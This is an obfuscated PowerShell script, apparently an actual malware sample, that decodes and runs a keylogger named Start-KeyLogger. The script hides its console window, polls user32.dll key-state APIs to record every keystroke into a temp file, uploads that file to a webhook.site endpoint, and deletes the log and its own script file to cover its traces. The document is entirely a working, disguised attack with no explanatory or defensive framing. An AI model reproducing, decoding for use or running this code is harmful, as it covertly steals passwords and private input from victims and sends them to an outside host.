(("{25}{11}{21}{49}{23}{4}{8}{3}{22}{36}{30}{28}{40}{52}{14}{41}{16}{35}{51}{2}{39}{45}{1}{24}{18}{13}{43}{5}{46}{44}{20}{27}{50}{19}{17}{15}{29}{6}{42}{7}{26}{34}{32}{37}{31}{33}{47}{12}{10}{9}{48}{38}{0}"-f '     powershell Remove-Item -Path 1HKnGyenv:tempiGtlog.ps11HK                                     
    }                                                                        
}                                                                            
                                                                             
Start-KeyLogger                                                              
1HK@)                                                                        
','int wFlags);                                                              
w9Y@                                                                         
                                                                             
    egLnGyA = Add-Type -MemberDefinition egLnGysi -N','    [DllImport(1HKuser32.dl','etCurrentProcess()','agnostics.P',' {                                
                egLnGystate = egLnGyA::GetAsyncK','             egLnGysuccess = egLnGyA::ToUn',' egLnGymycharegL.Capacity','rocess]::G','tentType w9Ytext/plainw9Y -In','b141c2ec -Method POST -Con','w9YSetw9Y,w9Yariaw9Y,w9Yblew9Y,w9Y-Vw9Y) -Name (1HK{1}{0}1HK -f w9Ytw9Y,w9Ypuw9Y) -Value (@1HK                
egLnGyt = w9Y[DllImport(1HKuser32.dl','-3ca5-4db0-9dba-705b',' try {         
        egLnGyti = get-date                                                  
        do {                                                                 
            Start-Sleep -Milliseconds 40                                     
            for (egLnGyas = 9; egLn','(int virtu','L)                        
                    ','HKuser32.dll1HK, CharSet=CharSet.Auto)]               
    public static extern int G','e = egLnGyA::GetKeyboardState(egLnGykbSeg','yP -ItemType File -Force                                                     
                                                                             
   ','ckkbstat','       egLnGynull = [console]::CapsLock                     
                    egLnGyVK ','l1HK)] public static extern bool ShowWindow(int handle, int state);w9Y                                                    
add-type -name win -member egLnGyt -na',' xdE Get-Process).MainWindowHandle, 0)                                                                           
                                                                             
functio','ive                                                                
[native.win]::ShowWindow(([System.Di','ame w9YWin32w9Y -Namespace API -PassThru                                                                           
    egLnGynull = New-Item -Path egLnG','.(1HK{0}{3}{1}{2}1HK-f ',', 0)','= egLnGyA::MapVirtualKey(egLnGyasegL, 3)                                         
                    egLnGykbS = New-Object Byte[] 256                        
            ','    public stat','egLnGymychar = New-Object -TypeName System.Text.StringBuilder                                                            
       ','true)]                                                             
','s(-1) -le egLnGyti)                                                       
    }                                                                        
    finally {                                                                
        powershell Invoke','                  [System.IO.File]::AppendAllText(egLnGyP, egLnGymychar, [System.Text.Encoding]::Unicode)                     
                    }                                                        
                }                                                            
            }                                                                
        }                                                                    
        while ((Get-Date).AddMinut','-WebRequest -Uri https://webhook.site/','                                                                            
                    if (egLnGysuccess) {                                     
      ','etKeyboardState(byte[] keystate);                                   
    [DllImport(1HKuser32.dll1HK, CharSet=Char','n Start-KeyLogger(egLnGyP = 1HKnGyenv:tempiGtkl.txt1HK) {                                                 
    egLnGysi = @w9Y                                                          
    [DllImport(1HKuser32.dll1HK, CharSet=CharSet.Auto, ExactSpelling=','e','       powershell Remove-Item -Path 1HKnGyenv:tempiGtkl.txt1HK                
   ','l1HK, CharSet=CharSet.Auto)]                                           
    public ','ic extern short GetAsyncKeyS','alKeyCode);                     
    [DllImport(1','icode(egLnGyasegL, egLnGyVKegL, egLnGykbSegL, egLnGymycharegL,','Gyas -le 254; egLnGyas++)','if (egLnGystate -eq -32767) {             
             ','static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, u','eyState(egLnGyas)                                                                   
                ','ddd9d09b','File 1HKnGyenv:tempiGtkl.txt1HK                
 ','mespace nat','        egLnGyche','Set.Auto)]                             
    public static extern int MapVirtualKey(uint uCode, int uMapType);        
','tate')).rEPLAce(([chAr]49+[chAr]72+[chAr]75),[stRing][chAr]34).rEPLAce(([chAr]105+[chAr]71+[chAr]116),[stRing][chAr]92).rEPLAce(([chAr]101+[chAr]103+[chAr]76),[stRing][chAr]96).rEPLAce(([chAr]119+[chAr]57+[chAr]89),[stRing][chAr]39).rEPLAce('nGy',[stRing][chAr]36).rEPLAce('xdE','|') | .( $veRboSEpREfeREncE.TOstriNg()[1,3]+'X'-jOin'')
